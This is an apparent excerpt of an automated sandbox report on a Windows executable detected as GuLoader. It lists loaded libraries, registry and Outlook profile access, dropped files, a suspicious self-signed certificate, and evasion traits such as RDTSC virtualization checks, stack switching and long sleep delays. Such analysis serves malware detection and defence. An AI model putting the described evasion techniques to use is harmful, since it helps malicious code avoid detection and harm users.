Source: C:\Users\user\Desktop\Researches.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\Researches.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: stempelpudernes.lnk.0.dr	LNK file: ..\Pictures\muringerne\giggliest.pha
Source: dinosaurusserne.lnk.0.dr	LNK file: ..\..\..\..\Users\Public\Pictures\eksistensberettigelsen.pre

Source: C:\Users\user\Desktop\Researches.exe

File written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierminister\raastofindvindinger\pulpitical\Nonideological\indberegne.ini

Jump to behavior

Source: C:\Users\user\Desktop\Researches.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.2951909943.0000000003D3A000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Researches.exe

Code function: 0_2_0040620C GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_0040620C

Source: C:\Users\user\Desktop\Researches.exe	Code function: 0_2_10002D50 push eax; ret	0_2_10002D7E
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D2F2C0 push esi; retf	11_2_02D2F2CE
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D25370 push edi; retf	11_2_02D2537E
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D2F180 push esi; retf	11_2_02D2F18E
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D226A0 push ebp; retf	11_2_02D226AE
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D227F0 push esi; retf	11_2_02D227FE
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D207E0 push edi; retf	11_2_02D207EA
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D217E7 push esp; retf	11_2_02D217F6
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D207EB push edi; retf	11_2_02D207FA
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D22790 push esi; retf	11_2_02D227FE
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D225B0 push ebp; retf	11_2_02D225BE
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D2D548 push esi; retf	11_2_02D2D556
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D20838 push edi; retf	11_2_02D207FA
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D21928 push esp; retf	11_2_02D21936
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D2CFAA push edi; retf	11_2_02D2CFB6
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D2CCD8 push edi; retf	11_2_02D2CCE6
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_02D21DF1 push esp; retf	11_2_02D21DFE
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_36824198 push esp; retf	11_2_36824199
Source: C:\Users\user\Desktop\Researches.exe	Code function: 11_2_369A97EE push 8B50369Ah; iretd	11_2_369A97F3

Persistence and Installation Behavior

AI detected suspicious PE digital signature

Source: Initial sample

Joe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) Self-signed certificate (issuer same as subject) which is not trusted by system. 2) Organization 'Hypnotize' is not a legitimate company name and appears suspicious. 3) Email domain 'Panikslagnes.Sma' is highly suspicious and not a legitimate business domain. 4) Large time gap between compilation date (2013) and certificate creation (2024) suggests possible tampering. 5) The OU field 'Uninfectiousness Languorousness' contains nonsensical terms that no legitimate business would use. 6) While the country code DE (Germany) is generally trustworthy, the combination with other suspicious elements suggests an attempt to appear legitimate. The certificate was created recently (2024) but fails validation, which is a strong indicator of malicious intent.

Source: C:\Users\user\Desktop\Researches.exe

File created: C:\Users\user\AppData\Local\Temp\nsh721B.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Researches.exe	API/Special instruction interceptor: Address: 42A180B
Source: C:\Users\user\Desktop\Researches.exe	API/Special instruction interceptor: Address: 27E180B

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Researches.exe	RDTSC instruction interceptor: First address: 427CF40 second address: 427CF40 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F6D94B76E68h 0x00000006 test dh, bh 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Researches.exe	RDTSC instruction interceptor: First address: 27BCF40 second address: 27BCF40 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F6D94E84B18h 0x00000006 test dh, bh 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc

Source: C:\Users\user\Desktop\Researches.exe	Memory allocated: 2D20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Memory allocated: 33650000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Memory allocated: 33460000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 598516	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 598287	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 597358	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 597249	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 597141	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 597029	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 596702	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 596266	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 596081	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 595844	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 595719	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Users\user\Desktop\Researches.exe	Thread delayed: delay time: 595500	Jump to behavior
